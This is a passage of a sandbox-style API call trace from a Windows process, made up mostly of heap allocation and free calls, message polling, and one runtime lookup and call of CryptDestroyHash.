1 [0244.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0244.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0244.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0244.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0244.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0244.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0244.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0244.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0244.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0244.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0244.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0244.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0244.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0244.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0244.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0244.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0244.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0244.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0244.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0244.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0244.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0244.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0244.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0244.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0244.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0244.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0244.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0244.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0244.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0244.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0244.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0244.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0244.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0244.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0244.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0244.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0244.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0244.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0244.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0244.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0244.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0244.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0244.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0244.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0244.478] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0244.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0244.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0244.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0244.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0244.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0244.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0244.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0244.478] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0244.478] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0244.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0244.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0244.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0244.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0244.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0244.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0244.479] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0244.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0244.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0244.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0244.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0244.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0244.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0244.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0244.479] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0244.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0244.480] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0244.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0244.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0244.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0244.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0244.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0244.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0244.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0244.480] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0244.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0244.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.480] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0244.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0244.480] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0244.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0244.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0244.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0244.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0244.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0244.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0244.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.481] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0244.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0244.481] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0244.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0244.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0244.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0244.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0244.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0244.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0244.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0244.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0244.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0244.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0244.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0244.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0244.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0244.482] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0244.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0244.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0244.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0244.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0244.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0244.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0244.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466df0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0244.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0244.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0244.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0244.483] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0244.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0244.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0244.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0244.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0244.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0244.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0244.483] CryptDestroyHash (hHash=0xaa58e0) returned 1 [0244.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0244.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0244.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0244.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0244.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0244.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0244.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0244.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0244.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0244.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0244.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0244.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0244.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0244.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0244.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0244.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0244.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0244.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0244.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0244.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0244.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0244.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0244.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0244.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0244.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0244.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0244.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0244.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0244.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0244.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0244.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0244.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0244.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0244.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0244.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0244.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0244.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0244.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0244.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0244.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0244.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0244.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0244.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0244.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0244.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0244.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0244.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0244.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0244.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0244.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0244.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0244.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0244.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0244.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0244.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0244.486] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0244.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0244.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0244.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0244.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0244.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0244.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0244.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0244.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0244.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0244.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0244.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0244.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0244.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0244.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0244.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0244.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0244.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0244.487] HeapFree 